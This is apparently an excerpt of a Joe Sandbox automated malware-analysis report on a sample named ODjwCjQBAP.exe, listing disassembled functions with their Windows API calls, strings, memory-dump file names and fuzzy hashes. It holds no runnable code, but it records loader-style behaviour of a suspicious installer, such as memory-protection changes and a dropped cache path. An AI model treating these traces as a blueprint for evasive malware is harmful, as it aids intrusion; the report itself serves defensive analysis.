Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
Instruction ID: e7f2061ded5818062db825bc0413707355dbbb7a887edde82a058a89c260750b
Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
Instruction Fuzzy Hash: 5EE046B6250108BADB00EFA4EE4AFA537ECAB44700F008021B608E60A1C678E6108B79

Function 00405BE2 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,00403274,00409130,00409130,00403178,004128D8,00004000,?,00000000,00403022), ref: 00405BF6

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
Instruction ID: ff987474db4941a2a63fe891919fb2946ba1e32a0df937fa27738628adbeee07
Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
Instruction Fuzzy Hash: 5EE0EC3261835AABEF509E559C04EEB7B6CFB05360F045432FD15E2190D275E8219BA5

Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729

Memory Dump Source

Source File: 00000000.00000002.2307798109.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2307780207.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307816109.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307831493.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_ODjwCjQBAP.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19

Function 00402336 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402369

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 90e07bb3a0b3f4804eab7f86ac5a4e71b50077df0b3d61eb17d11243db03f5ce
Instruction ID: 863d308e192ce4c0f66b0ae01519e0470cfafd3cecd099ef988cf845eccf6abb
Opcode Fuzzy Hash: 90e07bb3a0b3f4804eab7f86ac5a4e71b50077df0b3d61eb17d11243db03f5ce
Instruction Fuzzy Hash: D1E08630A04208BADB10AFA08F09EAD3A79AF41710F24003AF9507B0D1EAB84481DB2D

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 96c910dea8fbf951c2b9a4b5f3b3c3063cfa5e5189f353d5a1020b82a892de8f
Instruction ID: bac0d5995861a33a007bf1aced2086678d13136d77447ce7e9e78d56ca3cc0cd
Opcode Fuzzy Hash: 96c910dea8fbf951c2b9a4b5f3b3c3063cfa5e5189f353d5a1020b82a892de8f
Instruction Fuzzy Hash: DCD05BB2704115EBCB10DFE5EB0869D77B0DB40365F304137D151F21D0D2BADA559759

Function 00404128 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(0001045C,00000000,00000000,00000000), ref: 0040413A

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
Instruction ID: 75e74fd11ebe5bc6c3f22cf38e5f61c8940f983f04da59faa373adfcae7f6129
Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
Instruction Fuzzy Hash: 82C04C717442017AEA218B519D49F0677586794700F6544257320A60D0C6B4E450E62D

Function 00403277 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F75,?), ref: 00403285

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 00404111 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403F42), ref: 0040411F

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19

Function 004040FE Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403EDB), ref: 00404108

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E9

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d70777c03fab58a6680eac8bb77f8d646d92531b9a9c42126c115ca3ec13432e
Instruction ID: 6696c5b565abb4b072559f1c40de02a1b67f072cada9199909c9bbabd3d4a8ec
Opcode Fuzzy Hash: d70777c03fab58a6680eac8bb77f8d646d92531b9a9c42126c115ca3ec13432e
Instruction Fuzzy Hash: 1CD05EB3B14141ABDB20EBB8BAC445E77E4EB403257304837E502E2091E6798A428618

Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

Memory Dump Source

Source File: 00000000.00000002.2307798109.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2307780207.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307816109.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307831493.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_ODjwCjQBAP.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

Non-executed Functions

Function 00404A8D Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404AA5
GetDlgItem.USER32(?,00000408), ref: 00404AB0
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AFA
LoadBitmapA.USER32(0000006E), ref: 00404B0D
SetWindowLongA.USER32(?,000000FC,00405084), ref: 00404B26
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B3A
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B4C
SendMessageA.USER32(?,00001109,00000002), ref: 00404B62
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6E
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B80
DeleteObject.GDI32(00000000), ref: 00404B83
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAE
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BBA
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C4F
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C7A
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C8E
GetWindowLongA.USER32(?,000000F0), ref: 00404CBD
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CCB
ShowWindow.USER32(?,00000005), ref: 00404CDC
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DD9
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E3E
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E53
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E77
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E97
ImageList_Destroy.COMCTL32(00000000), ref: 00404EAC
GlobalFree.KERNEL32(00000000), ref: 00404EBC
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F35
SendMessageA.USER32(?,00001102,?,?), ref: 00404FDE
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FED
InvalidateRect.USER32(?,00000000,00000001), ref: 0040500D
ShowWindow.USER32(?,00000000), ref: 0040505B
GetDlgItem.USER32(?,000003FE), ref: 00405066
ShowWindow.USER32(00000000), ref: 0040506D

Strings

M, xrefs: 00404C36
, xrefs: 00405045
/7r, xrefs: 00405013
N, xrefs: 00404D17

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $/7r$M$N
API String ID: 1638840714-2378341541
Opcode ID: 83e2ede0a7d074a44b451b0b1dd27b036aaffd7360a27c1076ab9aa670ade9c5
Instruction ID: e0cc5522092fb32f5c2674b78011ac89e49f6c9f2dab24d514a8ff43177d9d20
Opcode Fuzzy Hash: 83e2ede0a7d074a44b451b0b1dd27b036aaffd7360a27c1076ab9aa670ade9c5
Instruction Fuzzy Hash: 1E025EB0900209AFEB209F94DC85AAE7BB5FB84315F10817AF611B62E1C7799D42DF58

Function 0040451A Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404569
SetWindowTextA.USER32(00000000,?), ref: 00404593
SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 00404644
CoTaskMemFree.OLE32(00000000), ref: 0040464F
lstrcmpiA.KERNEL32(Call,indfrselsartikel Setup: Installing), ref: 00404681
lstrcatA.KERNEL32(?,Call), ref: 0040468D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040469F

Part of subcall function 004056D1: GetDlgItemTextA.USER32(?,?,00000400,004046D6), ref: 004056E4

Part of subcall function 00406162: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ODjwCjQBAP.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061BA
Part of subcall function 00406162: CharNextA.USER32(?,?,?,00000000), ref: 004061C7
Part of subcall function 00406162: CharNextA.USER32(?,"C:\Users\user\Desktop\ODjwCjQBAP.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061CC
Part of subcall function 00406162: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061DC

GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 0040475D
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404778

Part of subcall function 004048D1: lstrlenA.KERNEL32(indfrselsartikel Setup: Installing,indfrselsartikel Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
Part of subcall function 004048D1: wsprintfA.USER32 ref: 00404977
Part of subcall function 004048D1: SetDlgItemTextA.USER32(?,indfrselsartikel Setup: Installing), ref: 0040498A

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously, xrefs: 0040466A
A, xrefs: 0040463D
Call, xrefs: 0040467B, 00404680, 0040468B
indfrselsartikel Setup: Installing, xrefs: 00404617, 0040467A
/7r, xrefs: 004047D4

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: /7r$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously$Call$indfrselsartikel Setup: Installing
API String ID: 2624150263-3491232225
Opcode ID: aa897a388f026c859834b9177abdad11152a1d64c9f36690aee5ee8c86f27191
Instruction ID: 7ea719a0b93bcaca37b111b678a2b5d6f3f78fc0ed79788128ac85d93e839f9f
Opcode Fuzzy Hash: aa897a388f026c859834b9177abdad11152a1d64c9f36690aee5ee8c86f27191
Instruction Fuzzy Hash: D5A18EB1900209ABDB11AFA5CC45AAFB7B8EF85314F10843BF711B62D1D77C8A418F69

Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
GlobalFree.KERNEL32(00000000), ref: 10001BCC
GlobalFree.KERNEL32(?), ref: 10001CC4
GlobalFree.KERNEL32(?), ref: 10001CC9
GlobalFree.KERNEL32(?), ref: 10001CCE
GlobalFree.KERNEL32(00000000), ref: 10001E76
lstrcpyA.KERNEL32(?,?), ref: 10001FCA

Memory Dump Source

Source File: 00000000.00000002.2307798109.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2307780207.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307816109.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307831493.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_ODjwCjQBAP.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

Function 00404225 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004042B0
GetDlgItem.USER32(00000000,000003E8), ref: 004042C4
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042E2
GetSysColor.USER32(?), ref: 004042F3
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404302
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404311
lstrlenA.KERNEL32(?), ref: 00404314
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404323
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404338
GetDlgItem.USER32(?,0000040A), ref: 0040439A
SendMessageA.USER32(00000000), ref: 0040439D
GetDlgItem.USER32(?,000003E8), ref: 004043C8
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404408
LoadCursorA.USER32(00000000,00007F02), ref: 00404417
SetCursor.USER32(00000000), ref: 00404420
ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 00404433
LoadCursorA.USER32(00000000,00007F00), ref: 00404440
SetCursor.USER32(00000000), ref: 00404443
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040446F
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404483

Strings

Call, xrefs: 004043F3
/7r, xrefs: 00404245
open, xrefs: 0040442B
N, xrefs: 004043B6

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
